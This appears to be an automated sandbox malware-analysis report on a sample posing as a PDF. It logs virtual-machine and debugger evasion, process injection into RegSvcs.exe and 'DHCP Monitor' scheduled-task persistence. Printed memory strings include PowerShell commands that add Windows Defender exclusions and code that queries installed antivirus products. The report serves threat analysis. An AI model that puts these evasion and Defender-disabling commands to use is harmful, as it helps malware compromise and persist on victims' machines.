Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXES
Source: itugx.exe, 00000002.00000003.400023583.0000000000EA5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.399006405.0000000000E96000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000002.412932307.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.396010910.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.400917680.0000000000EA7000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451422910.0000000001568000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000002.455510913.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451597738.000000000156B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.467505109.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000002.470674080.000000000146C000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.466572234.0000000001469000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXE
Source: itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505153695.00000000012B4000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509289794.00000000012B8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.509361220.00000000012BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")L
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXESUY;`D
Source: itugx.exe, 00000015.00000003.505153695.00000000012E8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000002.512758146.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506047618.00000000012EA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.508004868.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506688814.000000000135A000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.506384568.0000000001356000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXES.

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904	Thread sleep count: 64 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5904	Thread sleep count: 61 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748	Thread sleep count: 52 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 748	Thread sleep count: 89 > 30	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 1916	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 4028	Thread sleep count: 56 > 30
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 4136	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916	Thread sleep count: 54 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5916	Thread sleep count: 96 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460	Thread sleep count: 60 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5460	Thread sleep count: 83 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596	Thread sleep count: 45 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 5596	Thread sleep count: 82 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920	Thread sleep count: 64 > 30
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe TID: 1920	Thread sleep count: 55 > 30

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: threadDelayed 9667			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Window / User API: foregroundWindowGot 455			Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

API coverage: 5.3 %

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior

Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VMwaretray.exe") Then#
Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then=
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VboxService.exe") Thena46
Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe\Microso
Source: itugx.exe, 00000005.00000003.452233476.00000000014AC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareService.exe65687
Source: wscript.exe, 00000001.00000002.363558819.0000000002F60000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: en-USenVMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exe89
Source: wscript.exe, 0000000D.00000002.421779421.000001EDEF160000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: tBC:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
Source: rnnsh.xls.0.dr	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareService.exeipt.S
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VMwaretray.exe") Then
Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: name="VMware.VMware.vmui"
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Thenj0
Source: itugx.exe, 00000010.00000003.468344244.0000000001412000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwaretray.exe^`DE$
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Thenk5q
Source: wscript.exe, 00000016.00000002.491522356.0000021FFC240000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------
Source: itugx.exe, 00000017.00000003.539485403.0000000000CD1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwaretray.exe
Source: itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then
Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareService.exe") Then"
Source: rnnsh.xls.0.dr	Binary or memory string: If ProcessExists("VboxService.exe") Then
Source: wscript.exe, 00000001.00000003.361367465.00000000036F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware.VMware.vmuiData\Local\Temp\Folder8_410\itugx.exew
Source: itugx.exe, 00000015.00000003.509119527.0000000001299000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe6BA444D6.
Source: itugx.exe, 00000010.00000003.469045500.00000000013AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareUser.exe3A765687
Source: itugx.exe, 0000001C.00000002.577313681.00000000012C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareService.exe536C7
Source: itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwaretray.exeS
Source: itugx.exe, 00000002.00000002.412045117.00000000003E5000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: <description>"VMware Workstation"</description>
Source: itugx.exe, 00000002.00000003.397098361.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.389382633.0000000000E36000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000002.00000003.409778317.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451315387.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.452100532.0000000001510000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451193951.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462893753.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.461712871.00000000013F8000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.468154413.000000000140E000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.465422358.00000000013FB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VBoxTray.exe
Source: itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If DriveSpaceFree("d:\") < 1 And ProcessExists("VMwareUser.exe") Then
Source: itugx.exe, 00000005.00000003.451994345.000000000150D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwaretray.exen*
Source: wscript.exe, 0000001B.00000002.534995230.0000025B9C8D0000.00000004.00000020.00040000.00000000.sdmp	Binary or memory string: C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe\??\C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exeen-USenVMware.VMware.vmui-----------------------------------------[
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VboxService.exe
Source: itugx.exe, 00000005.00000003.410793804.00000000014A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000005.00000003.411039467.00000000014B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.462582507.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.440840027.00000000013B6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000010.00000003.439624886.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467653750.00000000012A5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.467286288.0000000001295000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 00000015.00000003.505411546.00000000012AE000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541378375.00000000012E5000.00000004.00000020.00020000.00000000.sdmp, itugx.exe, 0000001C.00000003.541599351.00000000012F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: If ProcessExists("VBoxTray.exe") Then
Source: itugx.exe, 0000001C.00000002.577313681.0000000001338000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwaretray.exe#
Source: rnnsh.xls.0.dr	Binary or memory string: If ProcessExists("VBoxTray.exe") Then

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CDE6A3 VirtualQuery,GetSystemInfo,

0_2_00CDE6A3

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CCA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00CCA69B
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00CDC220
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CEB348 FindFirstFileExA,	0_2_00CEB348
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_0037E387
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0037D836
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0038A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_0038A0FA
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0038A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_0038A488
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003865F1 FindFirstFileW,FindNextFileW,FindClose,	2_2_003865F1
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0034C642 FindFirstFileExW,	2_2_0034C642
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00387248 FindFirstFileW,FindClose,	2_2_00387248
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003872E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_003872E9
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_0037DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_0037DB69

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_00315D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

2_2_00315D78

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CE7DEE mov eax, dword ptr fs:[00000030h]		0_2_00CE7DEE
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00335078 mov eax, dword ptr fs:[00000030h]		2_2_00335078

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00CDF838

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe

Code function: 0_2_00CEC030 GetProcessHeap,

0_2_00CEC030

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0038F3FF BlockInput,

2_2_0038F3FF

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDF9D5 SetUnhandledExceptionFilter,	0_2_00CDF9D5
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CDF838
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CDFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00CDFBCA
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Code function: 0_2_00CE8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00CE8EBD
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00330D65 SetUnhandledExceptionFilter,	2_2_00330D65
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_003429B2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_003429B2
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00330BCF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00330BCF
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Code function: 2_2_00330FB1 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00330FB1

HIPS / PFW / Operating System Protection Evasion

Starts an encoded Visual Basic Script (VBE)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe
Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe			Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 1300000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Memory written: C:\Users\user\AppData\Local\Temp\RegSvcs.exe base: 11EE000			Jump to behavior

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe

Code function: 2_2_0037BB02 SendInput,keybd_event,

2_2_0037BB02

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\026910003102350.pdf.scr.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" daitsfsh-waune.icm.vbe	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe" rnnsh.xls	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmp897A.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmp8D34.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe "C:\Users\user\AppData\Local\Temp\FOLDER~1\itugx.exe" C:\Users\user\AppData\Local\Temp\FOLDER~1\rnnsh.xls
Source: C:\Users\user\AppData\Local\Temp\Folder8_410\itugx.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Contains functionality to query the security center for anti-virus and firewall products

Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $colitems = $owmi.execquery("select * from antivirusproduct")
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: for $objantivirusproduct in $colitems
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: $usb = $objantivirusproduct.displayname
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: next
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: return $usb
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: endfunc
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: func disabler()
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;if antivirus() = "windows defender" then
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ;#requireadmin
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," -command add-mppreference -exclusionpath " & @scriptdir,"","",@sw_hide)
Source: 026910003102350.pdf.scr.exe, 00000000.00000003.334455690.000000000739F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: shellexecute("powershell"," powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'","","",@sw_hide)
